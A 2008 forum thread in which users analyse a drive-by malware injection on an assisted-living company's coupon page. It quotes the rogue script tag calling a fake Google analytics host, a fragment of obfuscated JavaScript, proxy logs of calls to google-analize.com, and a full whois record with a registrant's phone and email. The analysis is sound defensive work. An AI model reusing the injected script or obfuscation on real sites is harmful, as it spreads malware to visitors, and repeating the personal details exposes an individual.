dslreports logo
 
    All Forums Hot Topics Gallery
spc
uniqs
32
mysec
Premium Member
join:2005-11-29

mysec to zteardrop

Premium Member

to zteardrop

Re: Trojan Win32.Agent.pz from Stoneybrook Assisted Living site

said by Mele20:

I went there on IE8 beta 1 and the moment I clicked on the invitation at the bottom of the main page for the free lunch, Avira immediately heuristically blocked it as unwanted malware.

This invitation-coupon is interesting. The page source includes this at the beginning:

<script src="http://analytics-google.info/i/urchin.js"></script
 

If you search for analytics-google.info/i/urchin.js you get some interesting posts about the use of that to give plausibility to the site. Many sites use google urchin. There is no such google site as shown here.

Also, unnoticed when the popup coupon page loads as I clicked on it, is the attempted connection to google-analize.com. However, loading the coupon.html page directly, I observed in the status bar that the page attempts to load:



____________________________________________

Since nothing cached, I assume google-analize.com is a dead site.

'google-analize' does not reveal itself when searching in the page source, so I assume it is obfuscated in the rest of the script. Some of the code:

<script>function c41920832628m4864c208c9ef8(m4864c208ca2de)
{ function m4864c208ca6c6(){return 16;} return 
(parseInt(m4864c208ca2de,m4864c208ca6c6()));}function
 m4864c208caece(m4864c208cb27e){ function m4864c208cbe35()
{var m4864c208cc21d=2;return m4864c208cc21d;} var 
m4864c208cb66a='';m4864c208cc605=String.fromCharCode;
for(m4864c208cba4e=0;m4864c208cba4e<m4864c208cb27e.length;
m4864c208cba4e+=m4864c208cbe35())
864c208cb66a+=(m4864c208cc605(c41920832628m4864c208c9ef8
(m4864c208cb27e.substr(m4864c208cba4e,m4864c208cbe35())))
);}return m4864c208cb66a;}
 

I'm hoping to find someone who can convert this to readable text.

The fact that google-analize does not attempt to load when opening the page in Opera indicates that this is may be an IE-specific exploit.

A hint that google-analize.com served up malware at one time is seen here:

»www.browsercrm.com/forum ··· =10&t=13
Something urgent, maybe it's nothing, but the first time I open browsercrm.com with Internet Explorer calls to google-analize.com/ and also executes google-analize.com/count.php and google-analize.com/exploits.php ...

Trying these URLs bring up page errors:



_____________________________________________________

A search for google-analize.com shows it is in many Hosts files, including MVPS.


---
Craig08
join:2008-03-31
.

4 edits

Craig08

Member

There seems to be a security certificate exploit. I forget the exact details of the certificate. (acidentally erased).I can't unscramble the code personally, but what happens, is that (Hijack.UserInit) -> Bad: (C:\WINDOWS\system32\userinit.exe, oembios are exploited. I had logging, just not the usual security setup...

No one should be going to these sites except for testing purposes.

Hope that helps,
craig .



Edit:info
Mele20
Premium Member
join:2001-06-05
Hilo, HI

1 edit

Mele20 to mysec

Premium Member

to mysec
google-analize.com is in the status bar of Fx3 when it loads the coupon page on a separate tab (after I click on the meal image on the main page). Proxo has a BUNCH of references to it in its log. Here's one:

+++GET 3108+++
GET /sl_style.css HTTP/1.1
Host: www.seniorlivinginstyle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008051206 Firefox/3.0.9.9
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, x-gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: hxxp://www.seniorlivinginstyle.com/popup/coupon_01.html
Connection: keep-alive
Match 3105: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3105: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3105: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3105: Bottom Add: Final JS Code 7.09.06 (ccw! !mos) [...] (d.r)
Match 3105: Bottom Mark: End 3.12.08 [sd] (d.r)
Match 3105: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3105: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
+++CLOSE 3105+++

+++RESP 3108+++
HTTP/1.1 200 OK
Date: Sat, 06 Sep 2008 06:51:37 GMT
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Last-Modified: Mon, 26 May 2008 10:40:08 GMT
ETag: "40058-280f-483a9388"
Accept-Ranges: bytes
Content-Length: 10255
Content-Type: text/css
Cache-Control: public, max-age=86400
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Top All Mark: Start 4.07.11 (multi) [sd] (d.r)
Match 3108: Top All Mark: End 6.12.25 [sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
Match 3108: Protect: CSS Comments 7.06.15 (dmp) [jd sd] (d.r)
+++CLOSE 3108+++
BlockList 3109: in User-Agents, line 77

+++GET 3109+++
GET /in.cgi?15&xu=1& HTTP/1.1
Host: google-analize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008051206 Firefox/3.0.9.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, x-gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Referer: »google-analize.com/
Connection: keep-alive
+++CLOSE 3109+++
BlockList 3110: in Bypass-List, line 19
BlockList 3111: in User-Agents, line 77

I'm going to keep Proxo's log window open and go there again on IE.

+++GET 3397+++
GET /popup/coupon_01.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/x-shockwave-flash, */*
Referer: hxxp://www.seniorlivinginstyle.com/community/stoneybrook.html
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, x-gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.seniorlivinginstyle.com
Connection: keep-alive

+++RESP 3397+++
HTTP/1.1 200 OK
Date: Sat, 06 Sep 2008 07:36:26 GMT
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Last-Modified: Fri, 27 Jun 2008 10:41:40 GMT
ETag: "f806b-d71-4864c3e4"
Accept-Ranges: bytes
Content-Length: 3441
Content-Type: text/html
Cache-Control: max-age=1
Match 3397: Top All Mark: Start 4.07.11 (multi) [sd] (d.r)
Match 3397: Top All Mark: End 6.12.25 [sd] (d.r)
Match 3397: Top JS Mark: Start 7.04.02 (multi) [sd] (d.r)
Match 3397: Top JS: Mark End 7.04.02 [sd] (d.r)
Match 3397: Top HTML Mark: Start 6.12.25 (multi) [sd] (d.r)
Match 3397: Top Sniff: HTML Content: HTML 7.08.05 (multi) [sd] (d.1)
Match 3397: Top HTML Mark: End 3.12.08 [sd] (d.r)
Match 3397: Header Top Mark: Start - Fix 7.09.09 (multi) [sd] (d.r)
Match 3397: Header Top Add: Initial JS Code 7.09.05 (ccw! !mos) [...] (d.r)
Match 3397: Header Top Mark: End 7.09.06 (multi) [sd] (d.r)
BlockList 3397: in AdPaths-J, line 83
Match 3397: Block: Scripts by URL 7.09.07 [pr] (d.2)
Match 3397: Header Bot Mark: Start - Fix 7.09.06 (multi) [sd] (d.r)
Match 3397: Header Bot Add: Default Script/Style Type if Missing 7.08.31 [sd] (d.1)
Match 3397: Header Bot Add: Navigation Links 4.11.01 [sd] (d.1)
Match 3397: Header Bot Mark: End 3.12.08 [sd] (d.r)
Match 3397: Mark: Start 5.11.05 (multi) [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3397: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3397: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3397: Bottom Mark: Start - Close open Tags 7.06.15 (multi) [sd] (d.r)
Match 3397: Bottom Add: Final JS Code 7.09.06 (ccw! !mos) [...] (d.r)
Match 3397: Bottom Mark: End 3.12.08 [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
Match 3397: : Mark First - Remove Dupes 7.07.23 (multi) [sd] (d.r)
+++CLOSE 3397+++
BlockList 3398: in User-Agents, line 72BlockList 3399: in User-Agents, line 72

+++GET 3399+++
GET /in.cgi?15&xu=1& HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/x-shockwave-flash, */*
Referer: »google-analize.com/
Accept-Language: en-us
UA-CPU: x86
Accept-Encoding: gzip, x-gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: google-analize.com

On IE I see a transparent gif. Could it be the problem?

BlockList 3400: in User-Agents, line 72

+++GET 3400+++
GET /images/coupon-freemeal.gif HTTP/1.1
Accept: */*
Referer: hxxp://www.seniorlivinginstyle.com/popup/coupon_01.html
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.seniorlivinginstyle.com
Connection: keep-alive
BlockList 3401: in User-Agents, line 72

+++GET 3401+++
GET /images/trans.gif HTTP/1.1
Accept: */*
Referer: hxxp://www.seniorlivinginstyle.com/popup/coupon_01.html
Accept-Language: en-us
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.seniorlivinginstyle.com
Connection: keep-alive

Avira now alerts AFTER the coupon tab opens on IE8. It was alerting before that earlier.

I reported the site as malicious to Microsoft.
mysec
Premium Member
join:2005-11-29

mysec

Premium Member

Thanks for the Proxo logs. I reloaded the main page and then cleared the cache. Clicking on the coupon, I see what is cached confirms your logs as to what is loaded from the seniorlivinginstyle.com site:

------------------------
GET /popup/coupon_01.html
GET /images/coupon-freemeal.gif
GET /images/trans.gif
------------------------






_______________________________________________

The transparent image (trans.gif) you mention doesn't seem to do anything.

Then your log shows

--------------------------------
GET /in.cgi?15&xu=1&
google-analize.com
--------------------------------

Since nothing caches, this confirms that the site is down. If that 'in.cgi' page did load, it might have called out for malware files as indicated in my link in above post.

A search for google-analize.com shows it registered to baumeisterlotze@web.de

Two listings here:

Malware Domain List
2008/06/19_14:50 google-analize.com/in.cgi?4 baumeisterlotze@web.de
2008/09/05_22:50 google-analize.com/in.cgi?15&22768ef22da7 baumeisterlotze@web.de



---

Millenniumle
join:2007-11-11
Fredonia, NY

1 edit

Millenniumle

Member

"http://analytics-google.info/i/urchin.js"
whois.net gives the registrant of analytics-google.info to:

Registrant Name:Kozenko Denis
Registrant Organization:N/A
Registrant Street1:Entuziastov, 24/81
Registrant Street2:
Registrant Street3:
Registrant City:St. Petersburg
Registrant State/Province:Leningradskaya oblast
Registrant Postal Code:78321
Registrant Country:RU
Registrant Phone:+007.9021012879
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:djadefb@mail.ru

Mr Kozenko of Russia.

======================================

I ran the link in IE6 SP3, XP Pro SP3, Guest account, scripts enabled, and default Software Restriction Policies. I didn't get any prompts or warnings. I don't have Java installed and XP is updated.

I don't even see the urchin.js file in my internet temp files. Perhaps having "Launching programs and files in an IFrame" set to disabled blocked the script as a "file?"

Then again, maybe I got hosed and don't know it.

Edit: MVP Hosts file squashed it. +1 to the hosts file.
mysec
Premium Member
join:2005-11-29

2 edits

mysec

Premium Member

said by Millenniumle:

I don't even see the urchin.js file in my internet temp files.

EDIT: I didn't see your Edit!

The URL to that file returns a page-not-found error, so it can't cache in any case.

For more on how that file worked in other exploits search for 'analytics-google.info/i/urchin.js'

You will see the same code that is in the coupon_01.html page posted above.

It seems that in this current situation, both the analytics-google.info and google-analize.com sites do not work, hence, the exploit cannot start.


---
calathea
join:2001-12-29
Scio, OR

calathea to Craig08

Member

to Craig08
craig08, can you elaborate on your certificate exploit comment? One thing this did was to kill my digital badge. I got another one which worked for a few minutes then it also quit working.

A question: assuming a keylogger is running on a machine, if you copy a password from a file and paste it into the application, does the keylogger see the characters of the password? Or does it just see the control-c control-v?

Thanks to everyone (mysec, mele20, zteardrop, therube, craig08, milleniumle, & &) for the information; hopefully the site will get cleaned up soon.
germ2893
join:2008-09-23
Wichita, KS

germ2893 to mysec

Member

to mysec
To the person who wanted the script converted to readable text:

Chances are it's just like this script:

»forums.oscommerce.com/in ··· c=315563

It boils down to an iframe - what a concept.

I haven't decoded the exact script you posted, but I'd guess it does the same thing.